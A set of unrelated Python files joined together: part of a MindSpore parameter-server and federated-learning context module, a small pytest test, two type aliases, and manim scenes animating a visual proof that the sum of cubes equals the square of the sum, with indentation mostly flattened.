"server_num": ps_context().set_server_num,
"scheduler_ip": ps_context().set_scheduler_ip,
"scheduler_port": ps_context().set_scheduler_port,
"fl_server_port": ps_context().set_fl_server_port,
"enable_fl_client": ps_context().set_fl_client_enable,
"start_fl_job_threshold": ps_context().set_start_fl_job_threshold,
"start_fl_job_time_window": ps_context().set_start_fl_job_time_window,
"update_model_ratio": ps_context().set_update_model_ratio,
"update_model_time_window": ps_context().set_update_model_time_window,
"share_secrets_ratio": ps_context().set_share_secrets_ratio,
"cipher_time_window": ps_context().set_cipher_time_window,
"reconstruct_secrets_threshold": ps_context().set_reconstruct_secrets_threshold,
"fl_name": ps_context().set_fl_name,
"fl_iteration_num": ps_context().set_fl_iteration_num,
"client_epoch_num": ps_context().set_client_epoch_num,
"client_batch_size": ps_context().set_client_batch_size,
"client_learning_rate": ps_context().set_client_learning_rate,
"worker_step_num_per_iteration": ps_context().set_worker_step_num_per_iteration,
"root_first_ca_path": ps_context().set_root_first_ca_path,
"root_second_ca_path": ps_context().set_root_second_ca_path,
"pki_verify": ps_context().set_pki_verify,
"equip_crl_path": ps_context().set_equip_crl_path,
"replay_attack_time_diff": ps_context().set_replay_attack_time_diff,
"enable_ssl": ps_context().set_enable_ssl,
"client_password": ps_context().set_client_password,
"server_password": ps_context().set_server_password,
"scheduler_manage_port": ps_context().set_scheduler_manage_port,
"config_file_path": ps_context().set_config_file_path,
"dp_eps": ps_context().set_dp_eps,
"dp_delta": ps_context().set_dp_delta,
"dp_norm_clip": ps_context().set_dp_norm_clip,
"encrypt_type": ps_context().set_encrypt_type,
"http_url_prefix": ps_context().set_http_url_prefix,
"global_iteration_time_window": ps_context().set_global_iteration_time_window,
"sign_k": ps_context().set_sign_k,
"sign_eps": ps_context().set_sign_eps,
"sign_thr_ratio": ps_context().set_sign_thr_ratio,
"sign_global_lr": ps_context().set_sign_global_lr,
"sign_dim_out": ps_context().set_sign_dim_out
}
_get_ps_context_func_map = {
"server_mode": ps_context().server_mode,
"ms_role": ps_context().ms_role,
"enable_ps": ps_context().is_ps_mode,
"enable_fl": ps_context().is_ps_mode,
"worker_num": ps_context().worker_num,
"server_num": ps_context().server_num,
"scheduler_ip": ps_context().scheduler_ip,
"scheduler_port": ps_context().scheduler_port,
"fl_server_port": ps_context().fl_server_port,
"enable_fl_client": ps_context().fl_client_enable,
"start_fl_job_threshold": ps_context().start_fl_job_threshold,
"start_fl_job_time_window": ps_context().start_fl_job_time_window,
"update_model_ratio": ps_context().update_model_ratio,
"update_model_time_window": ps_context().update_model_time_window,
"share_secrets_ratio": ps_context().share_secrets_ratio,
"cipher_time_window": ps_context().cipher_time_window,
"reconstruct_secrets_threshold": ps_context().reconstruct_secrets_threshold,
"fl_name": ps_context().fl_name,
"fl_iteration_num": ps_context().fl_iteration_num,
"client_epoch_num": ps_context().client_epoch_num,
"client_batch_size": ps_context().client_batch_size,
"client_learning_rate": ps_context().client_learning_rate,
"worker_step_num_per_iteration": ps_context().worker_step_num_per_iteration,
"dp_eps": ps_context().dp_eps,
"dp_delta": ps_context().dp_delta,
"dp_norm_clip": ps_context().dp_norm_clip,
"encrypt_type": ps_context().encrypt_type,
"root_first_ca_path": ps_context().root_first_ca_path,
"root_second_ca_path": ps_context().root_second_ca_path,
"pki_verify": ps_context().pki_verify,
"equip_crl_path": ps_context().equip_crl_path,
"replay_attack_time_diff": ps_context().replay_attack_time_diff,
"enable_ssl": ps_context().enable_ssl,
"client_password": ps_context().client_password,
"server_password": ps_context().server_password,
"scheduler_manage_port": ps_context().scheduler_manage_port,
"config_file_path": ps_context().config_file_path,
"http_url_prefix": ps_context().http_url_prefix,
"global_iteration_time_window": ps_context().global_iteration_time_window,
"sign_k": ps_context().sign_k,
"sign_eps": ps_context().sign_eps,
"sign_thr_ratio": ps_context().sign_thr_ratio,
"sign_global_lr": ps_context().sign_global_lr,
"sign_dim_out": ps_context().sign_dim_out
}
_check_positive_int_keys = ["server_num", "scheduler_port", "fl_server_port",
"start_fl_job_threshold", "start_fl_job_time_window", "update_model_time_window",
"fl_iteration_num", "client_epoch_num", "client_batch_size", "cipher_time_window",
"reconstruct_secrets_threshold"]
_check_non_negative_int_keys = ["worker_num"]
_check_positive_float_keys = ["update_model_ratio", "client_learning_rate"]
_check_port_keys = ["scheduler_port", "fl_server_port"]
def _get_ps_mode_rank():
ps_rank = ps_context().ps_rank_id()
if ps_rank == -1:
raise RuntimeError("The parameter server mode training is not enabled yet.")
return ps_rank
def _set_ps_context(**kwargs):
"""
Set parameter server training mode context.
Note:
Some other environment variables should also be set for parameter server training mode.
These environment variables are listed below:
.. code-block::
MS_SERVER_NUM # Server number
MS_WORKER_NUM # Worker number
MS_SCHED_HOST # Scheduler IP address
MS_SCHED_PORT # Scheduler port
MS_ROLE # The role of this process:
# MS_SCHED represents the scheduler,
# MS_WORKER represents the worker,
# MS_PSERVER represents the Server
Args:
enable_ps (bool): Whether to enable parameter server training mode.
Only after enable_ps is set True, the environment variables will be effective.
Default: False.
config_file_path (string): Configuration file path used by recovery. Default: ''.
scheduler_manage_port (int): scheduler manage port used to scale out/in. Default: 11202.
enable_ssl (bool): Set PS SSL mode enabled or disabled. Default: False.
client_password (str): Password to decrypt the secret key stored in the client certificate. Default: ''.
server_password (str): Password to decrypt the secret key stored in the server certificate. Default: ''.
Raises:
        ValueError: If input key is not an attribute in parameter server training mode context.
Examples:
>>> context.set_ps_context(enable_ps=True, enable_ssl=True, client_password='123456', server_password='123456')
"""
for key, value in kwargs.items():
if key not in _set_ps_context_func_map:
raise ValueError("Set PS context keyword %s is not recognized!" % key)
_check_value(key, value)
set_func = _set_ps_context_func_map[key]
set_func(value)
def _get_ps_context(attr_key):
"""
Get parameter server training mode context attribute value according to the key.
Args:
attr_key (str): The key of the attribute.
Returns:
Returns attribute value according to the key.
Raises:
        ValueError: If input key is not an attribute in parameter server training mode context.
"""
if attr_key not in _get_ps_context_func_map:
raise ValueError("Get PS context keyword %s is not recognized!" % attr_key)
get_func = _get_ps_context_func_map[attr_key]
value = get_func()
return value
def _reset_ps_context():
"""
Reset parameter server training mode context attributes to the default values:
- enable_ps: False.
"""
ps_context().reset()
def _is_role_worker():
return ps_context().is_worker()
def _is_role_pserver():
return ps_context().is_server()
def _is_role_sched():
return ps_context().is_scheduler()
def _insert_hash_table_size(name, cache_vocab_size, embedding_size, vocab_size):
ps_context().insert_hash_table_size(name, cache_vocab_size, embedding_size, vocab_size)
def _reinsert_hash_table_size(new_name, cur_name, cache_vocab_size, embedding_size):
ps_context().reinsert_hash_table_size(new_name, cur_name, cache_vocab_size, embedding_size)
def _insert_weight_init_info(name, global_seed, op_seed):
ps_context().insert_weight_init_info(name, global_seed, op_seed)
def _insert_accumu_init_info(name, init_val):
ps_context().insert_accumu_init_info(name, init_val)
def _clone_hash_table(dest_param_name, src_param_name):
ps_context().clone_hash_table(dest_param_name, src_param_name)
def _set_cache_enable(cache_enable):
    # Cap the number of BLAS/OpenMP threads via environment variables:
    # in a Ubuntu (GPU) environment, numpy would otherwise use too many
    # threads for computing.
if cache_enable:
os.environ['OPENBLAS_NUM_THREADS'] = '2'
os.environ['GOTO_NUM_THREADS'] = '2'
os.environ['OMP_NUM_THREADS'] = '2'
ps_context().set_cache_enable(cache_enable)
def _set_rank_id(rank_id):
ps_context().set_rank_id(rank_id)
def _is_ps_mode():
return _get_ps_context("server_mode") == "PARAMETER_SERVER"
def _is_fl_mode():
return _get_ps_context("server_mode") in ("FEDERATED_LEARNING", "HYBRID_TRAINING")
def _check_value(key, value):
"""
Validate the value for parameter server context keys.
"""
if key in _check_positive_int_keys:
Validator.check_positive_int(value, key)
if key in _check_non_negative_int_keys:
Validator.check_non_negative_int(value, key)
if key in _check_positive_float_keys:
Validator.check_positive_float(value, key)
if key in _check_port_keys:
if value < 1 or value > 65535:
raise ValueError("The range of %s must be 1 to 65535, but got %d." % (key, value))
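# Minimal round-trip sketch (a hypothetical check; assumes the MS_* environment
# variables documented in _set_ps_context are already exported for this process):
#   _set_ps_context(enable_ps=True)
#   assert _get_ps_context('enable_ps')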
|
nilq/baby-python
|
python
|
import pytest
from ..classes import ml_util
def test_objective_function():
    new_objective = ml_util.ObjectiveFunction()
    new_objective.load_data(path="Use Cases/VPS Popcorn Production/Docker/src/data/vpsFeatures.csv")
    new_objective.fit_model()
    prediction = new_objective.get_objective(4000)
    # Use an approximate comparison: exact float equality on a fitted model's
    # output is brittle across platforms and library versions.
    assert prediction == pytest.approx(0.6553353728953759)
|
nilq/baby-python
|
python
|
AddressType = int
SelectorType = int
|
nilq/baby-python
|
python
|
from manimlib.imports import *
from my_manim_projects.my_utils.my_3D_mobject import *
from my_manim_projects.my_utils.my_text import *
class Sum_of_cubes(ThreeDScene):
CONFIG = {
'camera_init': {
'phi': 52.5 * DEGREES,
'gamma': 0,
'theta': -45 * DEGREES,
},
'camera_config': {
'should_apply_shading': False
},
}
def construct(self):
self.set_camera_orientation(**self.camera_init)
color_list = [[GREEN_E, MAROON, GREEN_A, TEAL_D],
[MAROON, BLUE_D, GOLD_D, PURPLE_A],
[GREEN_A, GOLD_D, RED, YELLOW_D],
[TEAL_D, PURPLE_A, YELLOW_D, PINK]]
shift_list = [0, 1.5, 1.5 + 2.5, 1.5 + 2.5 + 3.5]
size = 0.5
cube_config = {
# 'reset_color': False,
'cube_size': size,
'gap': 0,
'fill_opacity': 0.85,
'stroke_color': WHITE,
'stroke_width': 1.2,
}
cube_config_02 = {
# 'reset_color': False,
'cube_size': size,
'gap': 0,
'fill_opacity': 0.2,
'stroke_color': WHITE,
'stroke_width': 0.6,
}
group_all = VGroup()
for j in range(4):
for i in range(4):
rect_ij = Cube_array(resolution=(4 - j, i + 1, 1), fill_color=color_list[4 - 1 - j][i], **cube_config)\
.outer_faces.shift((shift_list[4 - 1 - j] * UP + shift_list[i] * RIGHT) * size)
group_all.add(rect_ij)
s = 1.0
square_01 = self.l_shape_mn((1, 1), 4, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
square_02 = self.l_shape_mn((3, 3), 4, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
square_03 = self.l_shape_mn((6., 6.), 4, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
square_04 = self.rect_mn_2d((10., 10.), 4, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
group_square = VGroup(square_01, square_02, square_03, square_04)
group_all_02 = VGroup()
for j in range(4):
for i in range(4):
rect_ij = Cube_array(resolution=(4 - j, i + 1, 1), fill_color=color_list[4 - 1 - j][i], **cube_config_02)\
.outer_faces.shift((shift_list[4 - 1 - j] * UP + shift_list[i] * RIGHT) * size * (1 + s))
group_all_02.add(rect_ij)
group_all.shift((LEFT + DOWN) * 4 + (LEFT + UP) * 0.8).shift(np.array([0, 0, 1.2]))
group_square.shift((LEFT + DOWN) * 4 + (LEFT + UP) * 0.8 + np.array([0, 0, -0.25]))
group_all_02.shift((LEFT + DOWN) * 4 + (LEFT + UP) * 0.8)
group_01, group_02, group_03, group_04 = VGroup(), VGroup(), VGroup(), VGroup()
group_01.add(group_all_02[12])
group_02.add(group_all_02[8], group_all_02[9], group_all_02[13])
group_03.add(group_all_02[4], group_all_02[5], group_all_02[6], group_all_02[10], group_all_02[14])
group_04.add(group_all_02[0], group_all_02[1], group_all_02[2], group_all_02[3], group_all_02[7], group_all_02[11], group_all_02[15])
for i in range(16):
self.play(FadeIn(group_all[i]), run_time=0.15)
self.play(ApplyMethod(group_all[i].shift, np.array([0, 0, -1.2])), run_time=0.45)
self.wait(0.1)
self.wait(2)
self.play(ApplyMethod(group_all.scale, 0.8))
self.wait()
self.add(group_square)
self.play(ReplacementTransform(group_all, group_all_02), run_time=1.75)
self.wait(2.)
opac = 0.15
### 2 ** 2 anim
a = group_02[0].copy()
self.add(a)
group_02[0].set_fill(color_list[0][1], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.5)
self.play(ApplyMethod(a.shift, RIGHT * (1.5 + s * 1) * size), run_time=0.9)
self.wait(0.8)
a = group_02[2].copy()
self.add(a)
group_02[2].set_fill(color_list[0][1], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.64)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 0.5 * size), run_time=0.2)
self.play(ApplyMethod(a.shift, UP * (2 + s * 1) * size), run_time=0.8)
self.wait(1.2)
### 3 ** 3 anim
# move right
a = group_03[1].copy()
self.add(a)
group_03[1].set_fill(color_list[2][1], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.64)
self.play(ApplyMethod(a.shift, RIGHT * (2.5 + s * 2) * size), run_time=1.)
self.wait(0.8)
a = group_03[0].copy()
self.add(a)
group_03[0].set_fill(color_list[0][2], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 2]) * size), run_time=0.8)
self.play(ApplyMethod(a.shift, RIGHT * (4 + s * 3) * size), run_time=1.2)
self.wait(0.8)
# move up
a = group_03[4].copy()
self.add(a)
group_03[4].set_fill(color_list[2][0], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.64)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 1 * size), run_time=0.3)
self.play(ApplyMethod(a.shift, UP * (5. + s * 3) * size), run_time=1.5)
self.wait(0.8)
a = group_03[3].copy()
self.add(a)
group_03[3].set_fill(color_list[2][1], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 2]) * size), run_time=0.8)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 0.5 * size), run_time=0.2)
self.play(ApplyMethod(a.shift, UP * (3 + s * 2) * size), run_time=1.)
self.wait(1.2)
### 4 ** 4 anim
# move right
a = group_04[2].copy()
self.add(a)
group_04[2].set_fill(color_list[3][2], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.64)
self.play(ApplyMethod(a.shift, RIGHT * (3.5 + s * 3) * size), run_time=1.)
self.wait(0.8)
a = group_04[1].copy()
self.add(a)
group_04[1].set_fill(color_list[3][1], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 2]) * size), run_time=0.8)
self.play(ApplyMethod(a.shift, RIGHT * (6 + s * 5) * size), run_time=1.6)
self.wait(0.8)
a = group_04[0].copy()
self.add(a)
group_04[0].set_fill(color_list[3][0], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 3]) * size), run_time=0.9)
self.play(ApplyMethod(a.shift, RIGHT * (7.5 + s * 6) * size), run_time=1.8)
self.wait(0.8)
# move up
a = group_04[6].copy()
self.add(a)
group_04[6].set_fill(color_list[3][0], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.64)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 1.5 * size), run_time=0.36)
self.play(ApplyMethod(a.shift, UP * (9 + s * 6) * size), run_time=2.2)
self.wait(0.8)
a = group_04[5].copy()
self.add(a)
group_04[5].set_fill(color_list[3][1], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 2]) * size), run_time=0.8)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 1 * size), run_time=0.3)
self.play(ApplyMethod(a.shift, UP * (6 + s * 6) * size), run_time=2.)
self.wait(0.8)
a = group_04[4].copy()
self.add(a)
group_04[4].set_fill(color_list[3][2], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 3]) * size), run_time=0.9)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 0.5 * size), run_time=0.2)
self.play(ApplyMethod(a.shift, UP * (3.5 + s * 3.5) * size), run_time=1.8)
self.wait(4)
def l_shape_mn(self, mn, stroke_scale, scale_factor=1, **kwargs):
m, n = mn[0], mn[1]
p = np.array([[-1, -1, 0], [2 * n - 1, -1, 0], [2 * n - 1, 2 * m - 1, 0], [-1, 2 * m - 1, 0]]) * 0.5
l01 = Line(p[1], p[2], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
l02 = Line(p[2], p[3], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
return VGroup(l01, l02)
def rect_mn_2d(self, mn, stroke_scale, scale_factor=1, **kwargs):
m, n = mn[0], mn[1]
p = np.array([[-1, -1, 0], [2 * n - 1, -1, 0], [2 * n - 1, 2 * m - 1, 0], [-1, 2 * m - 1, 0]]) * 0.5
rect_mn = Polygon(p[0], p[1], p[2], p[3], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
return rect_mn
class Sum_of_cubes_new(ThreeDScene):
CONFIG = {
'camera_init': {
'phi': 52.5 * DEGREES,
'gamma': 0,
'theta': -45 * DEGREES,
},
'camera_config': {
'should_apply_shading': False
},
}
def construct(self):
self.set_camera_orientation(**self.camera_init)
color_list = [[GREEN_E, MAROON, GREEN_A, TEAL_D],
[MAROON, BLUE_D, GOLD_D, PURPLE_A],
[GREEN_A, GOLD_D, RED, YELLOW_D],
[TEAL_D, PURPLE_A, YELLOW_D, PINK]]
shift_list = [0, 1.5, 1.5 + 2.5, 1.5 + 2.5 + 3.5]
size = 0.5
cube_config = {
# 'reset_color': False,
'cube_size': size,
'gap': 0,
'fill_opacity': 0.85,
'stroke_color': WHITE,
'stroke_width': 1.2,
}
cube_config_02 = {
# 'reset_color': False,
'cube_size': size,
'gap': 0,
'fill_opacity': 0.2,
'stroke_color': WHITE,
'stroke_width': 0.6,
}
group_all = VGroup()
for j in range(4):
for i in range(4):
rect_ij = Cube_array(resolution=(4 - j, i + 1, 1), fill_color=color_list[4 - 1 - j][i], **cube_config)\
.outer_faces.shift((shift_list[4 - 1 - j] * UP + shift_list[i] * RIGHT) * size)
group_all.add(rect_ij)
s = 0.98
# square_01 = self.l_shape_mn((1, 1), 4, scale_factor=0.9, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
# square_02 = self.l_shape_mn((3, 3), 4, scale_factor=0.9, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
# square_03 = self.l_shape_mn((6., 6.), 4, scale_factor=0.9, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
# square_04 = self.rect_mn_2d((10., 10.), 4, scale_factor=0.9, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
# group_square = VGroup(square_01, square_02, square_03, square_04).set_shade_in_3d()
s02 = 1.1
group_all_02 = VGroup()
for j in range(4):
for i in range(4):
rect_ij = Cube_array(resolution=(4 - j, i + 1, 1), fill_color=color_list[4 - 1 - j][i], **cube_config_02)\
.scale(s02).outer_faces.shift((shift_list[4 - 1 - j] * UP + shift_list[i] * RIGHT) * size * (1 + s))
group_all_02.add(rect_ij)
group_all.shift((LEFT + DOWN) * 2.25 + (LEFT + UP) * 0.8).shift(np.array([0, 0, 1.2])).scale(1.5)
# group_square.shift((LEFT + DOWN) * 3.5 + (LEFT + UP) * 0.8 + np.array([0, 0, -0.25]))
group_all_02.shift((LEFT + DOWN) * 4. + (LEFT + UP) * 0.8)
group_01, group_02, group_03, group_04 = VGroup(), VGroup(), VGroup(), VGroup()
group_01.add(group_all_02[12])
group_02.add(group_all_02[8], group_all_02[9], group_all_02[13])
group_03.add(group_all_02[4], group_all_02[5], group_all_02[6], group_all_02[10], group_all_02[14])
group_04.add(group_all_02[0], group_all_02[1], group_all_02[2], group_all_02[3], group_all_02[7], group_all_02[11], group_all_02[15])
for i in range(16):
self.play(FadeIn(group_all[i]), run_time=0.12)
self.play(ApplyMethod(group_all[i].shift, np.array([0, 0, -1.2])), run_time=0.3)
self.wait(0.08)
self.wait(0.5)
brace_01 = Brace(group_all, DOWN)
tex_01 = brace_01.get_tex('1+2+\\cdots+n')
brace_02 = Brace(group_all, RIGHT)
tex_02 = brace_02.get_tex('1+2+\\cdots+n').rotate(PI/2).next_to(brace_02, RIGHT * 0.5)
tex_group = VGroup(brace_01, brace_02, tex_01, tex_02).align_to(group_all, IN)
self.play(FadeIn(tex_group), run_time=1.5)
self.wait(0.25)
color_dict = {'^2': BLUE, '^3': PINK, '+': ORANGE, '(': RED, ')': RED}
tex_sum_01 = MyText('(', '1', '+', '2', '+', '\\cdots', '+', 'n', ')', '^2', default_font='华光粗圆_CNKI').set_height(1.25).shift(UP * 1)
tex_sum_01.set_color_by_tex_to_color_map(color_dict)
bg_01 = SurroundingRectangle(tex_sum_01, stroke_color=YELLOW, fill_color=BLACK, fill_opacity=0.8, plot_depth=-1)
replace_dict = {'1': '1', '2': '2', '^2': '2', 'n': 'n', '+': ' + ', '\\cdots': '...'}
tex_sum_new_01 = tex_sum_01.get_new_font_texs(replace_dict)
t_01 = VGroup(bg_01.scale(1.1), tex_sum_new_01,)
self.add_fixed_in_frame_mobjects(t_01)
self.play(FadeIn(bg_01), Write(tex_sum_new_01), run_time=2.)
self.wait(2)
self.play(FadeOut(tex_group), FadeOut(t_01), run_time=1.2)
# self.play(ApplyMethod(group_all.scale, 0.8), run_time=0.8)
self.wait(0.3)
self.play(ReplacementTransform(group_all, group_all_02.scale(1.25)), run_time=1.5)
self.wait(1.)
self.play(group_all_02.scale, 1/1.25, run_time=1.5)
self.wait(0.5)
opac = 0.15
### 2 ** 2 anim
a = group_02[0].copy()
self.add(a)
group_02[0].set_fill(color_list[0][1], opac)
self.play(ApplyMethod(a.shift, OUT * size * s02), run_time=0.6)
self.play(a.align_to, group_02[1], LEFT, run_time=0.6)
self.wait(0.8)
a = group_02[2].copy()
self.add(a)
group_02[2].set_fill(color_list[0][1], opac)
self.play(ApplyMethod(a.shift, OUT * size * s02), run_time=0.6)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_02[1], RIGHT, run_time=0.25)
self.play(a.align_to, group_02[1], UP, run_time=0.8)
self.wait(1.)
### 3 ** 3 anim
# move right
a = group_03[1].copy()
self.add(a)
group_03[1].set_fill(color_list[2][1], opac)
self.play(ApplyMethod(a.shift, OUT * size * s02), run_time=0.6)
self.play(a.align_to, group_03[2], LEFT, run_time=1)
self.wait(0.8)
a = group_03[0].copy()
self.add(a)
group_03[0].set_fill(color_list[0][2], opac)
self.play(ApplyMethod(a.shift, 2 * OUT * size * s02), run_time=0.8)
self.play(a.align_to, group_03[2], LEFT, run_time=1.2)
self.wait(0.8)
# move up
a = group_03[4].copy()
self.add(a)
group_03[4].set_fill(color_list[2][0], opac)
self.play(ApplyMethod(a.shift, OUT * size* s02), run_time=0.6)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_03[2], RIGHT, run_time=0.3)
self.play(a.align_to, group_03[2], UP, run_time=1.4)
self.wait(0.8)
a = group_03[3].copy()
self.add(a)
group_03[3].set_fill(color_list[2][1], opac)
self.play(ApplyMethod(a.shift, 2 * OUT * size * s02), run_time=0.8)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_03[2], RIGHT, run_time=0.25)
self.play(a.align_to, group_03[2], UP, run_time=1.)
self.wait(1.)
### 4 ** 4 anim
# move right
a = group_04[2].copy()
self.add(a)
group_04[2].set_fill(color_list[3][2], opac)
self.play(ApplyMethod(a.shift, OUT * size * s02), run_time=0.6)
self.play(a.align_to, group_04[3], LEFT, run_time=0.9)
self.wait(0.8)
a = group_04[1].copy()
self.add(a)
group_04[1].set_fill(color_list[3][1], opac)
self.play(ApplyMethod(a.shift, 2 * OUT * size * s02), run_time=0.8)
self.play(a.align_to, group_04[3], LEFT, run_time=1.25)
self.wait(0.8)
a = group_04[0].copy()
self.add(a)
group_04[0].set_fill(color_list[3][0], opac)
self.play(ApplyMethod(a.shift, 3 * OUT * size * s02), run_time=0.9)
self.play(a.align_to, group_04[3], LEFT, run_time=1.75)
self.wait(0.8)
# move up
a = group_04[6].copy()
self.add(a)
group_04[6].set_fill(color_list[3][0], opac)
self.play(ApplyMethod(a.shift, OUT * size * s02), run_time=0.6)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_04[3], RIGHT, run_time=0.35)
self.play(a.align_to, group_04[3], UP, run_time=2)
self.wait(0.8)
a = group_04[5].copy()
self.add(a)
group_04[5].set_fill(color_list[3][1], opac)
self.play(ApplyMethod(a.shift, 2 * OUT * size * s02), run_time=0.8)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_04[3], RIGHT, run_time=0.3)
self.play(a.align_to, group_04[3], UP, run_time=1.8)
self.wait(0.8)
a = group_04[4].copy()
self.add(a)
group_04[4].set_fill(color_list[3][2], opac)
self.play(ApplyMethod(a.shift, 3 * OUT * size * s02), run_time=0.9)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_04[3], RIGHT, run_time=0.25)
self.play(a.align_to, group_04[3], UP, run_time=1.6)
self.wait()
tex_sum_02 = MyText('1', '^3', '+', '2', '^3', '+', '\\cdots', '+', 'n', '^3', default_font='华光粗圆_CNKI').set_height(1.25).shift(DOWN * 1.25)
tex_sum_02.set_color_by_tex_to_color_map(color_dict)
replace_dict = {'1': '1', '2': '2', '^3': '3', 'n': 'n', '+': ' + ', '\\cdots': '...'}
bg_02 = SurroundingRectangle(tex_sum_02, stroke_color=YELLOW, fill_color=BLACK, fill_opacity=0.8, plot_depth=-1)
tex_sum_new_02 = tex_sum_02.get_new_font_texs(replace_dict)
t_02 = VGroup(bg_02.scale(1.1), tex_sum_new_02,)
self.add_fixed_in_frame_mobjects(t_02)
self.play(FadeIn(bg_02), Write(tex_sum_new_02), run_time=2)
self.wait(2)
self.play(FadeOut(VGroup(*self.mobjects)), run_time=1.8)
self.wait(0.5)
# self.play(FadeIn(t_01.shift(UP)), FadeIn(t_02.shift(DOWN * 0.5)), run_time=1)
# self.wait(0.4)
#
# equation = MyText('\\sum', '_{i=1}', '^n', 'i', '^3', '\\quad=\\quad', '(', '\\sum', '_{i=1}', '^n', 'i', ')', '^2', default_font='华光粗圆_CNKI').set_height(1.5)
# replace_dict = {'1': '1', '2': '2', '^3': '3', '^n': 'n', '^2': '2', '\\quad=\\quad': ' = ', '_{i=1}': 'i=1',
# '\\sum': '∑', '(': '(', ')': ')'}
# equ = equation.get_new_font_texs(replace_dict)
# self.add_fixed_in_frame_mobjects(equ)
#
# self.play(Write(equ[5]))
# self.wait(0.4)
# self.play(ReplacementTransform(t_02, equ[0:5]), run_time=1.2)
# self.wait(0.5)
# self.play(ReplacementTransform(t_01, equ[6:]), run_time=1.2)
#
# self.wait(4)
def l_shape_mn(self, mn, stroke_scale, scale_factor=1, **kwargs):
m, n = mn[0], mn[1]
p = np.array([[-1, -1, 0], [2 * n - 1, -1, 0], [2 * n - 1, 2 * m - 1, 0], [-1, 2 * m - 1, 0]]) * 0.5
l01 = Line(p[1], p[2], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
l02 = Line(p[2], p[3], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
return VGroup(l01, l02)
def rect_mn_2d(self, mn, stroke_scale, scale_factor=1, **kwargs):
m, n = mn[0], mn[1]
p = np.array([[-1, -1, 0], [2 * n - 1, -1, 0], [2 * n - 1, 2 * m - 1, 0], [-1, 2 * m - 1, 0]]) * 0.5
rect_mn = Polygon(p[0], p[1], p[2], p[3], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
return rect_mn
class Equation_2d(Scene):
def construct(self):
color_dict = {'^2': BLUE, '^3': PINK, '+': ORANGE, '(': RED, ')': RED}
tex_sum_01 = MyText('(', '1', '+', '2', '+', '\\cdots', '+', 'n', ')', '^2', default_font='华光粗圆_CNKI').set_height(1.25).shift(UP * 1)
tex_sum_01.set_color_by_tex_to_color_map(color_dict)
bg_01 = SurroundingRectangle(tex_sum_01, stroke_color=YELLOW, fill_color=BLACK, fill_opacity=0.8, plot_depth=-1)
replace_dict = {'1': '1', '2': '2', '^2': '2', 'n': 'n', '+': ' + ', '\\cdots': '...'}
tex_sum_new_01 = tex_sum_01.get_new_font_texs(replace_dict)
t_01 = VGroup(bg_01.scale(1.1), tex_sum_new_01,)
tex_sum_02 = MyText('1', '^3', '+', '2', '^3', '+', '\\cdots', '+', 'n', '^3', default_font='华光粗圆_CNKI').set_height(1.25).shift(DOWN * 1.25)
tex_sum_02.set_color_by_tex_to_color_map(color_dict)
replace_dict = {'1': '1', '2': '2', '^3': '3', 'n': 'n', '+': ' + ', '\\cdots': '...'}
bg_02 = SurroundingRectangle(tex_sum_02, stroke_color=YELLOW, fill_color=BLACK, fill_opacity=0.8, plot_depth=-1)
tex_sum_new_02 = tex_sum_02.get_new_font_texs(replace_dict)
t_02 = VGroup(bg_02.scale(1.1), tex_sum_new_02,)
equation = MyText('\\sum', '^n', '_{i=1}', 'i', '^3', '=', '(', '\\sum', '^n', '_{i=1}', 'i', ')', '^2',
default_font='华光粗圆_CNKI', color=WHITE).set_height(2.2)
equation.set_color_by_tex_to_color_map({
'\\sum': RED,
# # '^{n}': RED,
'_{i=1}': YELLOW,
'i':YELLOW,
'^3': PINK,
'^2': BLUE,
})
replace_dict = {'^3': '3', '^n': '∑', '^2': '2', '=': '=', '_{i=1}': 'i=1',
'\\sum': 'n', '(': '(', ')': ')'}
equ = equation.get_new_font_texs(replace_dict)
